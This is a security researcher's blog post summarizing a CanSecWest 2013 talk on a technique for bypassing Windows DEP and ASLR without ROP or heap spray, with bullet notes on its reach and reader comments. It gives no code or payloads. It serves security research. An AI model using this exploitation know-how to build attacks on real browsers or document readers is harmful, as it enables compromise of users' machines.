View RSS Feed

Fb1h2s aka Rahul Sasi's Blog

DEP ASLR bypass without ROP JIT : CanSecWest2013 Slides and Analysis

Rating: 3 votes, 3.33 average.
I have my own talk from CanSecwest to blog about but this one is more interesting and the most awaited one. So here are the slides, I will add my own analysis and test cases to this blog entry later. Interesting thing is we had this technique discussed on garage in november .

Yu Yang @tombkeeper did a demo of the technique on Ms013-08 and it does not ever need a heap spray for his ASLR/DEP bypass technique .

And the exploit is scary, its a quick kaboom with out heap spray.
He calls this method GIFT [ Got it form a table] .
The simple technique is to change the VFT of wow64sharedinformation and it's ptr.

Here are couple of quick notes on the bypass Technique :

Good news about the Technique:.

  • Totally ASLR/DEP free
  • Language/SP independent
  • Work on almost all use-after-free/vtable-overflow
  • Target on IE, firefox, pdf reader, flash, office Ö
  • Even donít need shellcode
  • Sometimes donít need heapspray
  • Need a Windows file sharing server
  • It is not a real problem
  • Only work on 32-bit process in x64 Windows
  • This situation is very common
  • Can not work on Windows 8

The documents and presentation is from Yu Yang @tombkeeper
Download Slides from here:

Tags: None Add / Edit Tags


  1. 41.w4r10r's Avatar
    few months back we discussed something similar here
  2. webdevil's Avatar
    Vinnu discussed this a while ago on the forum. Go Vinnu go!

    And Thanks for the slides!
    Updated 03-08-2013 at 10:59 AM by webdevil
  3. cons0ul's Avatar
  4. fb1h2s's Avatar
    Well while attending the talk I was wondering how I knew the talk even before, and I was like it might be another Deja Vu .


Total Trackbacks 0
Trackback URL: